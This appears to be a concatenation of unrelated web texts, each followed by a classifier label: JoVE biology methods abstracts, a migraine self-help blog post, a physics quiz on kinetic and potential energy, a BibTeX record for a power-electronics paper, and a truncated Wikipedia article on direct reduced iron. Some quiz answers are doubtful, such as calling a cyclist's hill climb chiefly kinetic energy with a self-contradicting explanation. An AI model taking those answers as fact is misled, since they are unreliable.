of the sequences for each step of the process, along with relevant designed structures, provides the user with a comprehensive quantitative assessment of the design. Here we provide the details of each design method, as well as several notable experimental successes attained through the use of the methods. Genetics, Issue 77, Molecular Biology, Bioengineering, Biochemistry, Biomedical Engineering, Chemical Engineering, Computational Biology, Genomics, Proteomics, Protein, Protein Binding, Computational Biology, Drug Design, optimization (mathematics), Amino Acids, Peptides, and Proteins, De novo protein and peptide design, Drug design, In silico sequence selection, Optimization, Fold specificity, Binding affinity, sequencing 50476 Play Button High-throughput Fluorometric Measurement of Potential Soil Extracellular Enzyme Activities Authors: Colin W. Bell, Barbara E. Fricks, Jennifer D. Rocca, Jessica M. Steinweg, Shawna K. McMahon, Matthew D. Wallenstein. Institutions: Colorado State University, Oak Ridge National Laboratory, University of Colorado. Microbes in soils and other environments produce extracellular enzymes to depolymerize and hydrolyze organic macromolecules so that they can be assimilated for energy and nutrients. Measuring soil microbial enzyme activity is crucial in understanding soil ecosystem functional dynamics. The general concept of the fluorescence enzyme assay is that synthetic C-, N-, or P-rich substrates bound with a fluorescent dye are added to soil samples. When intact, the labeled substrates do not fluoresce. Enzyme activity is measured as the increase in fluorescence as the fluorescent dyes are cleaved from their substrates, which allows them to fluoresce. Enzyme measurements can be expressed in units of molarity or activity. To perform this assay, soil slurries are prepared by combining soil with a pH buffer. The pH buffer (typically a 50 mM sodium acetate or 50 mM Tris buffer), is chosen for the buffer's particular acid dissociation constant (pKa) to best match the soil sample pH. The soil slurries are inoculated with a nonlimiting amount of fluorescently labeled (i.e. C-, N-, or P-rich) substrate. Using soil slurries in the assay serves to minimize limitations on enzyme and substrate diffusion. Therefore, this assay controls for differences in substrate limitation, diffusion rates, and soil pH conditions; thus detecting potential enzyme activity rates as a function of the difference in enzyme concentrations (per sample). Fluorescence enzyme assays are typically more sensitive than spectrophotometric (i.e. colorimetric) assays, but can suffer from interference caused by impurities and the instability of many fluorescent compounds when exposed to light; so caution is required when handling fluorescent substrates. Likewise, this method only assesses potential enzyme activities under laboratory conditions when substrates are not limiting. Caution should be used when interpreting the data representing cross-site comparisons with differing temperatures or soil types, as in situ soil type and temperature can influence enzyme kinetics. Environmental Sciences, Issue 81, Ecological and Environmental Phenomena, Environment, Biochemistry, Environmental Microbiology, Soil Microbiology, Ecology, Eukaryota, Archaea, Bacteria, Soil extracellular enzyme activities (EEAs), fluorometric enzyme assays, substrate degradation, 4-methylumbelliferone (MUB), 7-amino-4-methylcoumarin (MUC), enzyme temperature kinetics, soil 50961 Play Button Identification of Post-translational Modifications of Plant Protein Complexes Authors: Sophie J. M. Piquerez, Alexi L. Balmuth, Jan Sklenář, Alexandra M.E. Jones, John P. Rathjen, Vardis Ntoukakis. Institutions: University of Warwick, Norwich Research Park, The Australian National University. Plants adapt quickly to changing environments due to elaborate perception and signaling systems. During pathogen attack, plants rapidly respond to infection via the recruitment and activation of immune complexes. Activation of immune complexes is associated with post-translational modifications (PTMs) of proteins, such as phosphorylation, glycosylation, or ubiquitination. Understanding how these PTMs are choreographed will lead to a better understanding of how resistance is achieved. Here we describe a protein purification method for nucleotide-binding leucine-rich repeat (NB-LRR)-interacting proteins and the subsequent identification of their post-translational modifications (PTMs). With small modifications, the protocol can be applied for the purification of other plant protein complexes. The method is based on the expression of an epitope-tagged version of the protein of interest, which is subsequently partially purified by immunoprecipitation and subjected to mass spectrometry for identification of interacting proteins and PTMs. This protocol demonstrates that: i). Dynamic changes in PTMs such as phosphorylation can be detected by mass spectrometry; ii). It is important to have sufficient quantities of the protein of interest, and this can compensate for the lack of purity of the immunoprecipitate; iii). In order to detect PTMs of a protein of interest, this protein has to be immunoprecipitated to get a sufficient quantity of protein. Plant Biology, Issue 84, plant-microbe interactions, protein complex purification, mass spectrometry, protein phosphorylation, Prf, Pto, AvrPto, AvrPtoB 51095 Play Button Mapping Bacterial Functional Networks and Pathways in Escherichia Coli using Synthetic Genetic Arrays Authors: Alla Gagarinova, Mohan Babu, Jack Greenblatt, Andrew Emili. Institutions: University of Toronto, University of Toronto, University of Regina. Phenotypes are determined by a complex series of physical (e.g. protein-protein) and functional (e.g. gene-gene or genetic) interactions (GI)1. While physical interactions can indicate which bacterial proteins are associated as complexes, they do not necessarily reveal pathway-level functional relationships1. GI screens, in which the growth of double mutants bearing two deleted or inactivated genes is measured and compared to the corresponding single mutants, can illuminate epistatic dependencies between loci and hence provide a means to query and discover novel functional relationships2. Large-scale GI maps have been reported for eukaryotic organisms like yeast3-7, but GI information remains sparse for prokaryotes8, which hinders the functional annotation of bacterial genomes. To this end, we and others have developed high-throughput quantitative bacterial GI screening methods9, 10. Here, we present the key steps required to perform quantitative E. coli Synthetic Genetic Array (eSGA) screening procedure on a genome-scale9, using natural bacterial conjugation and homologous recombination to systemically generate and measure the fitness of large numbers of double mutants in a colony array format. Briefly, a robot is used to transfer, through conjugation, chloramphenicol (Cm) - marked mutant alleles from engineered Hfr (High frequency of recombination) 'donor strains' into an ordered array of kanamycin (Kan) - marked F- recipient strains. Typically, we use loss-of-function single mutants bearing non-essential gene deletions (e.g. the 'Keio' collection11) and essential gene hypomorphic mutations (i.e. alleles conferring reduced protein expression, stability, or activity9, 12, 13) to query the functional associations of non-essential and essential genes, respectively. After conjugation and ensuing genetic exchange mediated by homologous recombination, the resulting double mutants are selected on solid medium containing both antibiotics. After outgrowth, the plates are digitally imaged and colony sizes are quantitatively scored using an in-house automated image processing system14. GIs are revealed when the growth rate of a double mutant is either significantly better or worse than expected9. Aggravating (or negative) GIs often result between loss-of-function mutations in pairs of genes from compensatory pathways that impinge on the same essential process2. Here, the loss of a single gene is buffered, such that either single mutant is viable. However, the loss of both pathways is deleterious and results in synthetic lethality or sickness (i.e. slow growth). Conversely, alleviating (or positive) interactions can occur between genes in the same pathway or protein complex2 as the deletion of either gene alone is often sufficient to perturb the normal function of the pathway or complex such that additional perturbations do not reduce activity, and hence growth, further. Overall, systematically identifying and analyzing GI networks can provide unbiased, global maps of the functional relationships between large numbers of genes, from which pathway-level information missed by other approaches can be inferred9. Genetics, Issue 69, Molecular Biology, Medicine, Biochemistry, Microbiology, Aggravating, alleviating, conjugation, double mutant, Escherichia coli, genetic interaction, Gram-negative bacteria, homologous recombination, network, synthetic lethality or sickness, suppression 4056 Play Button Setting-up an In Vitro Model of Rat Blood-brain Barrier (BBB): A Focus on BBB Impermeability and Receptor-mediated Transport Authors: Yves Molino, Françoise Jabès, Emmanuelle Lacassagne, Nicolas Gaudin, Michel Khrestchatisky. Institutions: VECT-HORUS SAS, CNRS, NICN UMR 7259. The blood brain barrier (BBB) specifically regulates molecular and cellular flux between the blood and the nervous tissue. Our aim was to develop and characterize a highly reproducible rat syngeneic in vitro model of the BBB using co-cultures of primary rat brain endothelial cells (RBEC) and astrocytes to study receptors involved in transcytosis across the endothelial cell monolayer. Astrocytes were isolated by mechanical dissection following trypsin digestion and were frozen for later co-culture. RBEC were isolated from 5-week-old rat cortices. The brains were cleaned of meninges and white matter, and mechanically dissociated following enzymatic digestion. Thereafter, the tissue homogenate was centrifuged in bovine serum albumin to separate vessel fragments from nervous tissue. The vessel fragments underwent a second enzymatic digestion to free endothelial cells from their extracellular matrix. The remaining contaminating cells such as pericytes were further eliminated by plating the microvessel fragments in puromycin-containing medium. They were then passaged onto filters for co-culture with astrocytes grown on the bottom of the wells. RBEC expressed high levels of tight junction (TJ) proteins such as occludin, claudin-5 and ZO-1 with a typical localization at the cell borders. The transendothelial electrical resistance (TEER) of brain endothelial monolayers, indicating the tightness of TJs reached 300 ohm·cm2 on average. The endothelial permeability coefficients (Pe) for lucifer yellow (LY) was highly reproducible with an average of 0.26 ± 0.11 x 10-3 cm/min. Brain endothelial cells organized in monolayers expressed the efflux transporter P-glycoprotein (P-gp), showed a polarized transport of rhodamine 123, a ligand for P-gp, and showed specific transport of transferrin-Cy3 and DiILDL across the endothelial cell monolayer. In conclusion, we provide a protocol for setting up an in vitro BBB model that is highly reproducible due to the quality assurance methods, and that is suitable for research on BBB transporters and receptors. Medicine, Issue 88, rat brain endothelial cells (RBEC), mouse, spinal cord, tight junction (TJ), receptor-mediated transport (RMT), low density lipoprotein (LDL), LDLR, transferrin, TfR, P-glycoprotein (P-gp), transendothelial electrical resistance (TEER), 51278 Play Button Investigating Protein-protein Interactions in Live Cells Using Bioluminescence Resonance Energy Transfer Authors: Pelagia Deriziotis, Sarah A. Graham, Sara B. Estruch, Simon E. Fisher. Institutions: Max Planck Institute for Psycholinguistics, Donders Institute for Brain, Cognition and Behaviour. Assays based on Bioluminescence Resonance Energy Transfer (BRET) provide a sensitive and reliable means to monitor protein-protein interactions in live cells. BRET is the non-radiative transfer of energy from a 'donor' luciferase enzyme to an 'acceptor' fluorescent protein. In the most common configuration of this assay, the donor is Renilla reniformis luciferase and the acceptor is Yellow Fluorescent Protein (YFP). Because the efficiency of energy transfer is strongly distance-dependent, observation of the BRET phenomenon requires that the donor and acceptor be in close proximity. To test for an interaction between two proteins of interest in cultured mammalian cells, one protein is expressed as a fusion with luciferase and the second as a fusion with YFP. An interaction between the two proteins of interest may bring the donor and acceptor sufficiently close for energy transfer to occur. Compared to other techniques for investigating protein-protein interactions, the BRET assay is sensitive, requires little hands-on time and few reagents, and is able to detect interactions which are weak, transient, or dependent on the biochemical environment found within a live cell. It is therefore an ideal approach for confirming putative interactions suggested by yeast two-hybrid or mass spectrometry proteomics studies, and in addition it is well-suited for mapping interacting regions, assessing the effect of post-translational modifications on protein-protein interactions, and evaluating the impact of mutations identified in patient DNA. Cellular Biology, Issue 87, Protein-protein interactions, Bioluminescence Resonance Energy Transfer, Live cell, Transfection, Luciferase, Yellow Fluorescent Protein, Mutations 51438 Play Button Reporter-based Growth Assay for Systematic Analysis of Protein Degradation Authors: Itamar Cohen, Yifat Geffen, Guy Ravid, Tommer Ravid. Institutions: The Hebrew University of Jerusalem. Protein degradation by the ubiquitin-proteasome system (UPS) is a major regulatory mechanism for protein homeostasis in all eukaryotes. The standard approach to determining intracellular protein degradation relies on biochemical assays for following the kinetics of protein decline. Such methods are often laborious and time consuming and therefore not amenable to experiments aimed at assessing multiple substrates and degradation conditions. As an alternative, cell growth-based assays have been developed, that are, in their conventional format, end-point assays that cannot quantitatively determine relative changes in protein levels. Here we describe a method that faithfully determines changes in protein degradation rates by coupling them to yeast cell-growth kinetics. The method is based on an established selection system where uracil auxotrophy of URA3-deleted yeast cells is rescued by an exogenously expressed reporter protein, comprised of a fusion between the essential URA3 gene and a degradation determinant (degron). The reporter protein is designed so that its synthesis rate is constant whilst its degradation rate is determined by the degron. As cell growth in uracil-deficient medium is proportional to the relative levels of Ura3, growth kinetics are entirely dependent on the reporter protein degradation. This method accurately measures changes in intracellular protein degradation kinetics. It was applied to: (a) Assessing the relative contribution of known ubiquitin-conjugating factors to proteolysis (b) E2 conjugating enzyme structure-function analyses (c) Identification and characterization of novel degrons. Application of the degron-URA3-based system transcends the protein degradation field, as it can also be adapted to monitoring changes of protein levels associated with functions of other cellular pathways. Cellular Biology, Issue 93, Protein Degradation, Ubiquitin, Proteasome, Baker's Yeast, Growth kinetics, Doubling time 52021 Play Button A Protocol for Computer-Based Protein Structure and Function Prediction Authors: Ambrish Roy, Dong Xu, Jonathan Poisson, Yang Zhang. Institutions: University of Michigan , University of Kansas. Genome sequencing projects have ciphered millions of protein sequence, which require knowledge of their structure and function to improve the understanding of their biological role. Although experimental methods can provide detailed information for a small fraction of these proteins, computational modeling is needed for the majority of protein molecules which are experimentally uncharacterized. The I-TASSER server is an on-line workbench for high-resolution modeling of protein structure and function. Given a protein sequence, a typical output from the I-TASSER server includes secondary structure prediction, predicted solvent accessibility of each residue, homologous template proteins detected by threading and structure alignments, up to five full-length tertiary structural models, and structure-based functional annotations for enzyme classification, Gene Ontology terms and protein-ligand binding sites. All the predictions are tagged with a confidence score which tells how accurate the predictions are without knowing the experimental data. To facilitate the special requests of end users, the server provides channels to accept user-specified inter-residue distance and contact maps to interactively change the I-TASSER modeling; it also allows users to specify any proteins as template, or to exclude any template proteins during the structure assembly simulations. The structural information could be collected by the users based on experimental evidences or biological insights with the purpose of improving the quality of I-TASSER predictions. The server was evaluated as the best programs for protein structure and function predictions in the recent community-wide CASP experiments. There are currently >20,000 registered scientists from over 100 countries who are using the on-line I-TASSER server. Biochemistry, Issue 57, On-line server, I-TASSER, protein structure prediction, function prediction 3259 Play Button Biochemical Assays for Analyzing Activities of ATP-dependent Chromatin Remodeling Enzymes Authors: Lu Chen, Soon-Keat Ooi, Joan W. Conaway, Ronald C. Conaway. Institutions: Stowers Institute for Medical Research, Kansas University Medical Center. Members of the SNF2 family of ATPases often function as components of multi-subunit chromatin remodeling complexes that regulate nucleosome dynamics and DNA accessibility by catalyzing ATP-dependent nucleosome remodeling. Biochemically dissecting the contributions of individual subunits of such complexes to the multi-step ATP-dependent chromatin remodeling reaction requires the use of assays that monitor the production of reaction products and measure the formation of reaction intermediates. This JOVE protocol describes assays that allow one to measure the biochemical activities of chromatin remodeling complexes or subcomplexes containing various combinations of subunits. Chromatin remodeling is measured using an ATP-dependent nucleosome sliding assay, which monitors the movement of a nucleosome on a DNA molecule using an electrophoretic mobility shift assay (EMSA)-based method. Nucleosome binding activity is measured by monitoring the formation of remodeling complex-bound mononucleosomes using a similar EMSA-based method, and DNA- or nucleosome-dependent ATPase activity is assayed using thin layer chromatography (TLC) to measure the rate of conversion of ATP to ADP and phosphate in the presence of either DNA or nucleosomes. Using these assays, one can examine the functions of subunits of a chromatin remodeling complex by comparing the activities of the complete complex to those lacking one or more subunits. The human INO80 chromatin remodeling complex is used as an example; however, the methods described here can be adapted to the study of other chromatin remodeling complexes. Biochemistry, Issue 92, chromatin remodeling, INO80, SNF2 family ATPase, biochemical assays, ATPase, nucleosome remodeling, nucleosome binding 51721 Play Button Using SCOPE to Identify Potential Regulatory Motifs in Coregulated Genes Authors: Viktor Martyanov, Robert H. Gross. Institutions: Dartmouth College. SCOPE is an ensemble motif finder that uses three component algorithms in parallel to identify potential regulatory motifs by over-representation and motif position preference1. Each component algorithm is optimized to find a different kind of motif. By taking the best of these three approaches, SCOPE performs better than any single algorithm, even in the presence of noisy data1. In this article, we utilize a web version of SCOPE2 to examine genes that are involved in telomere maintenance. SCOPE has been incorporated into at least two other motif finding programs3,4 and has been used in other studies5-8. The three algorithms that comprise SCOPE are BEAM9, which finds non-degenerate motifs (ACCGGT), PRISM10, which finds degenerate motifs (ASCGWT), and SPACER11, which finds longer bipartite motifs (ACCnnnnnnnnGGT). These three algorithms have been optimized to find their corresponding type of motif. Together, they allow SCOPE to perform extremely well. Once a gene set has been analyzed and candidate motifs identified, SCOPE can look for other genes that contain the motif which, when added to the original set, will improve the motif score. This can occur through over-representation or motif position preference. Working with partial gene sets that have biologically verified transcription factor binding sites, SCOPE was able to identify most of the rest of the genes also regulated by the given transcription factor. Output from SCOPE shows candidate motifs, their significance, and other information both as a table and as a graphical motif map. FAQs and video tutorials are available at the SCOPE web site which also includes a "Sample Search" button that allows the user to perform a trial run. Scope has a very friendly user interface that enables novice users to access the algorithm's full power without having to become an expert in the bioinformatics of motif finding. As input, SCOPE can take a list of genes, or FASTA sequences. These can be entered in browser text fields, or read from a file. The output from SCOPE contains a list of all identified motifs with their scores, number of occurrences, fraction of genes containing the motif, and the algorithm used to identify the motif. For each motif, result details include a consensus representation of the motif, a sequence logo, a position weight matrix, and a list of instances for every motif occurrence (with exact positions and "strand" indicated). Results are returned in a browser window and also optionally by email. Previous papers describe the SCOPE algorithms in detail1,2,9-11. Genetics, Issue 51, gene regulation, computational biology, algorithm, promoter sequence motif 2703 Play Button Immunoblot Analysis Authors: Sean Gallagher, Deb Chakavarti. Institutions: UVP, LLC, Keck Graduate Institute of Applied Life Sciences. Immunoblotting (western blotting) is a rapid and sensitive assay for the detection and characterization of proteins that works by exploiting the specificity inherent in antigen-antibody recognition. It involves the solubilization and electrophoretic separation of proteins, glycoproteins, or lipopolysaccharides by gel electrophoresis, followed by quantitative transfer and irreversible binding to nitrocellulose, PVDF, or nylon. The immunoblotting technique has been useful in identifying specific antigens recognized by polyclonal or monoclonal antibodies and is highly sensitive (1 ng of antigen can be detected). This unit provides protocols for protein separation, blotting proteins onto membranes, immunoprobing, and visualization using chromogenic or chemiluminescent substrates. Basic Protocols, Issue 16, Current Protocols Wiley, Immunoblotting, Biochemistry, Western Blotting, chromogenic substrates, chemiluminescent substrates, protein detection. 759 Copyright © JoVE 2006-2015. All Rights Reserved. Policies | License Agreement | ISSN 1940-087X simple hit counter What is Visualize? JoVE Visualize is a tool created to match the last 5 years of PubMed publications to methods in JoVE's video library. How does it work? We use abstracts found on PubMed and match them to JoVE videos to create a list of 10 to 30 related methods videos. Video X seems to be unrelated to Abstract Y... In developing our video relationships, we compare around 5 million PubMed articles to our library of over 4,500 methods videos. In some cases the language used in the PubMed abstracts makes matching that content to a JoVE video difficult. In other cases, there happens not to be any content in our video library that is relevant to the topic of a given abstract. In these cases, our algorithms are trying their best to display videos with relevant content, which can sometimes result in matched videos with only a slight relation.
__label__pos
0.78471
Strategies for Coping with Migraine and Wrist Sensations Strategies for Coping with Migraine and Wrist Sensations Understanding Migraines and Wrist Sensations Migraine attacks and wrist sensations can significantly impact daily life and require effective coping strategies. Migraines are a neurological condition characterized by severe headaches often accompanied by other symptoms such as sensitivity to light and sound, nausea, and vomiting. Wrist sensations, such as tingling, numbness, or pain, can result from nerve compression or repetitive motion. Recording and Tracking Symptoms A crucial step in managing migraine attacks and wrist sensations is recording and tracking symptoms. This helps monitor patterns, identify triggers, and assist with diagnosis and treatment. Consider the following methods for tracking symptoms: • Keeping a migraine diary: Keep a record of pain intensity, duration, location, and related wrist sensations. Note any triggers, such as certain foods, hormonal changes, or stress. For example, if you notice that your migraine attacks tend to occur after consuming chocolate, you can avoid it to reduce the frequency of migraine attacks. • Using smartphone apps or online tools: Utilize convenient digital tools to track symptoms on the go. These apps provide data analysis and visual representations of your symptoms, facilitating better communication with healthcare professionals. Managing Migraine and Wrist Sensations in Daily Life Lifestyle modifications play a significant role in managing migraine attacks and wrist sensations. Consider implementing the following strategies: • Healthy diet and hydration: Maintain a balanced diet, avoiding known migraine triggers such as processed foods, caffeine, and alcohol. Stay hydrated throughout the day. For example, instead of reaching for a cup of coffee, opt for herbal tea or water. • Stress management techniques: Explore stress reduction methods, such as deep breathing exercises, meditation, or yoga, to minimize the impact of stress on migraine attacks and wrist sensations. Find activities that help you relax and incorporate them into your daily routine. • Regular exercise and physical activity: Engage in moderate physical activity, such as walking or swimming, to promote overall well-being and migraine management. Consult with a healthcare professional before starting a new exercise routine. Avoiding Triggers Identifying and avoiding personal triggers is key to preventing migraine attacks and managing wrist sensations. Consider the following tips: • Adjusting daily routines: Create a consistent sleep schedule, maintain regular meal times, and manage stress levels to minimize potential triggers. For example, establish a relaxing bedtime routine and ensure you are getting enough sleep each night. • Creating a calm and migraine-friendly environment: Limit exposure to bright lights, loud noises, and strong odors. Designate a quiet and dimly lit space for relaxation. Use noise-canceling headphones or earplugs to reduce sensory stimuli. Medication and Treatment Options Various medication and treatment options are available to manage migraine attacks and alleviate wrist sensations. Consult with a healthcare professional to determine the most suitable approach for your specific condition. Options may include: • Over-the-counter pain relievers: Non-prescription medications like ibuprofen or aspirin may provide relief for mild to moderate migraine attacks. However, it’s important to follow the recommended dosage and be aware of potential side effects. • Prescription medications for migraine attacks: Your doctor may prescribe specific medications, such as triptans, to treat acute migraine attacks or preventive medications to reduce the frequency and intensity of migraine episodes. Follow your healthcare provider’s instructions and inform them of any side effects you experience. • Physical therapy for wrist sensations: A physical therapist can design exercises and provide treatments to alleviate wrist sensations caused by nerve compression or repetitive motion. They may recommend specific stretches or techniques to improve wrist mobility and reduce discomfort. • Alternative therapies: Consider alternative approaches such as acupuncture, relaxation techniques, or biofeedback to complement your migraine management plan. These options can provide additional relief and relaxation. Consult with a qualified practitioner before trying alternative therapies. Seeking Medical Advice and Support Consulting a healthcare professional is essential for accurate diagnosis and personalized treatment plans. When seeking medical advice, consider the following: • Available treatment options: Discuss the range of treatment options available and their suitability for your specific migraine attacks and wrist sensations. Ask about the potential benefits and risks of each treatment. • Potential side effects and risks: Understand the potential side effects and risks associated with different medications and treatments to make informed decisions. Disclose any existing medical conditions and medications you are currently taking to your healthcare provider. • Referrals to specialists if necessary: Your healthcare provider may refer you to specialists, such as neurologists or orthopedists, for further evaluation and treatment of migraine attacks or wrist sensations. Follow through with the recommended referrals to ensure comprehensive care. Conclusion Managing migraine attacks and wrist sensations requires a multifaceted approach. By recording and tracking symptoms, implementing lifestyle modifications, avoiding triggers, exploring medication options, and seeking medical advice and support, individuals can effectively cope with these challenging conditions and improve their quality of life. Remember that each person’s experience and response to treatments may vary. It’s important to find what works best for your individual needs and seek professional guidance along the way. Empower yourself to take control of migraine attacks and wrist sensations in your daily life. Jenny from Migraine Buddy Love You Will Also Like Open Back to Blog Leave your mobile to get a link to download the app
__label__pos
0.992565
% Encoding: UTF-8 @COMMENT{BibTeX export based on data in FAU CRIS: https://cris.fau.de/} @COMMENT{For any questions please write to [email protected]} @inproceedings{faucris.245485774, abstract = {The asymmetrical half-bridge converter implemented with GaN-switches represents a great candidate for achieving high power density and high efficiency. These requirements call for the implementation of a synchronous rectifier on the secondary side to push the efficiency. Furthermore, higher switching frequencies lead to smaller passive components needed for compact power supplies. In order to gain accurate and reliable simulation results for these high switching frequencies, this paper presents a detailed simulation model featuring parasitics of all semiconductors and transformer capacitances. Besides current and voltage waveforms of one switching cycle, this model allows for studying ZVS transitions as well. Measurements on a practical test setup deliver waveforms very close to the simulation results and thus prove the validity of the simulation model.}, author = {Kohlhepp, Benedikt and Zeller, Valentin and Barwig, Markus and Dürbaum, Thomas}, booktitle = {2020 22nd European Conference on Power Electronics and Applications, EPE 2020 ECCE Europe}, date = {2020-09-07/2020-09-11}, doi = {10.23919/EPE20ECCEEurope43536.2020.9215674}, faupublication = {yes}, isbn = {9789075815368}, keywords = {Gallium Nitride (GaN); Simulation; Soft switching; Switched-mode power supply; ZvS converters}, note = {Created from Fastlane, Scopus look-up}, peerreviewed = {unknown}, publisher = {Institute of Electrical and Electronics Engineers Inc.}, title = {{Detailed} {Simulation} {Model} of an {Asymmetrical} {Half}-{Bridge} {PWM} {Converter} with {Synchronous} {Rectification} including {Parasitic} {Elements}}, venue = {Lyon}, year = {2020} }
__label__pos
1
Kinetic And Potential Energy Trivia Reviewed by Matt Balanda Matt Balanda, BS (Aerospace Engineering) | Physics Review Board Member Matt holds a Bachelor's of Science in Aerospace Engineering and Mathematics from the University of Arizona, along with a Master's in Educational Leadership for Faith-Based Schools from California Baptist University. A devoted leader, he transitioned from Aerospace Engineering to inspire students. As the High School Vice-Principal and a skilled Physics teacher at Calvary Chapel Christian School, his passion is nurturing a love for learning and deepening students' connection with God, fostering a transformative educational journey. , BS (Aerospace Engineering) Approved & Edited by ProProfs Editorial Team The editorial team at ProProfs Quizzes consists of a select group of subject experts, trivia writers, and quiz masters who have authored over 10,000 quizzes taken by more than 100 million users. This team includes our in-house seasoned quiz moderators and subject matter experts. Our editorial experts, spread across the world, are rigorously trained using our comprehensive guidelines to ensure that you receive the highest quality quizzes. Learn about Our Editorial Process | By Kinchuah K Kinchuah Community Contributor Quizzes Created: 2 | Total Attempts: 12,374 Questions: 10 | Viewed: 5,678 1. What type of energy does a parked car have? Answer: Potential Explanation: A parked car has potential energy due to its position. This type of energy is stored based on the object's position relative to other objects, using gravitational force as a factor. For a car parked on a hill, the higher it is up the hill, the greater its potential gravitational energy. The energy could be converted into kinetic energy (the energy of motion) if the car starts to move downhill. Therefore, potential energy is the most accurate description for a stationary car in a specific context like being on an incline. 2. Which form of energy is possessed by a flying bird? Answer: Kinetic Explanation: A flying bird primarily possesses kinetic energy because this form of energy is associated with motion. As the bird flies, its velocity converts the potential energy stored in its muscles into kinetic energy. The faster the bird flies, the more kinetic energy it generates. This energy enables the bird to continue moving and maneuver in the air, overcoming air resistance and gravitational pull through the expenditure of energy in the form of movement. 3. What energy transformation occurs when a bow is drawn? Answer: Potential to Kinetic Explanation: When a bow is drawn, potential energy is stored in the stretched limbs of the bow. The mechanical energy exerted by pulling the bowstring back is converted into potential energy as the bow is held in tension. Once the bowstring is released, this potential energy is rapidly converted back into kinetic energy as the bow returns to its original shape and the arrow is propelled forward with significant force. This demonstrates the transformation of energy from potential to kinetic within the mechanics of archery. 4. Where is potential energy highest in a swung pendulum? Answer: At the top Explanation: In a swinging pendulum, potential energy is highest at the top of the swing, where the pendulum's speed is at its lowest. At this point, the pendulum has maximum potential energy due to its elevated position against gravity. As the pendulum begins its descent, this potential energy is converted into kinetic energy, which increases as the pendulum speeds up reaching the lowest point. Thus, the maximum potential energy at the top is a result of its height and gravitational potential. 5. What type of energy does a compressed spring hold? Answer: Potential Explanation: A compressed spring holds potential energy, which is stored due to its position. When the spring is compressed, mechanical work is done against the spring’s natural force, which stores energy in the form of elastic potential energy. This energy is retained until the force compressing the spring is removed, at which point the stored energy is converted back to kinetic energy as the spring returns to its original shape, pushing against whatever compressed it. 6. Which energy is primarily used by a cyclist climbing a hill? Answer: Kinetic Explanation: When a cyclist climbs a hill, they are primarily using kinetic energy to propel the bicycle forward; however, as they reach higher elevation, the energy usage shifts towards gaining potential energy due to increased altitude. The kinetic energy from pedaling is converted into potential energy, which could potentially be converted back into kinetic energy on a downhill path. Therefore, the cyclist's effort in climbing a hill translates directly into potential energy accumulation in relation to gravity. 7. What kind of energy does water behind a dam possess? Answer: Potential Explanation: The water stored behind a dam possesses potential energy due to its elevated position relative to the base of the dam. This gravitational potential energy is significant because of the large volume of water and the height from which it can potentially fall. When the water is released, this potential energy is converted into kinetic energy as the water moves downward through the dam's turbines, generating electricity as a result of this energy transformation. 8. Which form of energy is demonstrated by a stretched rubber band? Answer: Potential Explanation: A stretched rubber band exhibits potential energy. When the rubber band is stretched, it stores elastic potential energy based on how much it is deformed from its natural state. This stored energy is a result of the work done in stretching it, and this energy can be released as kinetic energy when the band snaps back to its original shape, propelling any attached objects or itself forward. 9. What kind of energy transformation occurs when brakes are applied to a moving car? Answer: Kinetic to Thermal Explanation: When brakes are applied to a moving car, the kinetic energy of the car (due to its motion) is transformed into thermal energy. This transformation occurs through friction between the car's brake pads and the wheel or drum. This friction generates heat, effectively converting the motion energy of the car into heat energy, which dissipates into the environment. This process is an example of the conservation of energy where kinetic energy is not lost but converted into another form. 10. Which type of energy does a fruit hanging from a tree exhibit? Answer: Potential Explanation: A fruit hanging from a tree exhibits potential energy due to its position relative to the ground. This gravitational potential energy is calculated based on the fruit’s mass, the acceleration due to gravity, and its height from the ground. Should the fruit fall, this potential energy would convert into kinetic energy as the fruit accelerates towards the Earth under the influence of gravity. Back to Top Back to top Advertisement × Wait! Here's an interesting quiz for you. We have other quizzes matching your interest.
__label__pos
0.999835
Direct reduced iron From Wikipedia, the free encyclopedia Jump to: navigation, search Production préréduits (DRI et HBI) par procédés Midrex HYL Charbon.svg Direct-reduced iron (DRI), also called sponge iron,[1] is produced from direct reduction of iron ore (in the form of lumps, pellets or fines) by a reducing gas produced from natural gas or coal. ‘Reduced iron’ derives its name from the chemical change that iron ore undergoes when it is heated in a furnace at high temperatures in the presence of hydrocarbon-rich gasses. Direct reduction refers to processes which reduce iron oxides to metallic iron below the melting point of iron. The product of such solid state processes are called direct reduced iron. The reducing gas is a mixture of gasses, primarily hydrogen (H2) and carbon monoxide (CO). Process[edit] Direct reduction processes can be divided roughly into two categories, gas-based, and coal-based. In both cases, the objective of the process is to drive off the oxygen contained in various forms of iron ore (sized ore, concentrates, pellets, mill scale, furnace dust etc.), in order to convert the ore, without melting it (below 1200ºC), to metallic iron. The direct reduction process is comparatively energy efficient. Steel made using DRI requires significantly less coal, in that a traditional blast furnace is not needed. DRI is most commonly made into steel with electric arc furnaces to take advantage of the latent heat produced by the DRI product.[2] In modern times, direct reduction processes have been developed to specifically overcome difficulties of conventional blast furnaces. DRI is successfully manufactured in various parts of the world through either natural gas or coal-based technology. The initial investment and operating costs of direct reduction plants are low compared to integrated steel plants and are more suitable for developing countries where supplies of coking coal are limited. Factors that help make DRI economical: • Direct-reduced iron has about the same iron content as pig iron, typically 90–94% total iron (depending on the quality of the raw ore) as opposed to about 93% for molten pig iron, so it is an excellent feedstock for the electric furnaces used by mini mills, allowing them to use lower grades of scrap for the rest of the charge or to produce higher grades of steel. • Hot-briquetted iron (HBI) is a compacted form of DRI designed for ease of shipping, handling, and storage. • Hot direct reduced iron (HDRI) is iron not cooled before discharge from the reduction furnace, that is immediately transported to a waiting electric arc furnace and charged, thereby saving energy. • The direct reduction process uses pelletized iron ore or natural "lump" ore. One exception is the fluidized bed process which requires sized iron ore particles. Few ores are suitable for direct reduction. • The direct reduction process can use natural gas contaminated with inert gases, avoiding the need to remove these gases for other use. However, any inert gas contamination of the reducing gas lowers the effect (quality) of that gas stream and the thermal efficiency of the process. • Supplies of powdered ore and raw natural gas are both available in areas such as Northern Australia, avoiding transport costs for the gas. In most cases the DRI plant is located near natural gas source as it is more cost effective to ship the ore rather than the gas. • this method produces 97% pure iron. India is the world’s largest producer of direct-reduced iron, a vital constituent of the steel industry.[1] Many other countries use variants of the process, so providing iron for local engineering industries. Problems[edit] Directly reduced iron is highly susceptible to oxidation and rusting if left unprotected, and is normally quickly processed further to steel.[citation needed] The bulk iron can also catch fire since it is pyrophoric.[3] Unlike blast furnace pig iron, which is almost pure metal, DRI contains some siliceous gangue, which needs to be removed in the steel-making process. History[edit] Main article: Bloomery Producing sponge iron and then working it was the earliest method used to obtain iron in the Middle East, Egypt, and Europe, where it remained in use until at least the 16th century. There is some evidence that the bloomery method was also used in China, but China had developed blast furnaces to obtain pig iron by 500 BCE. The 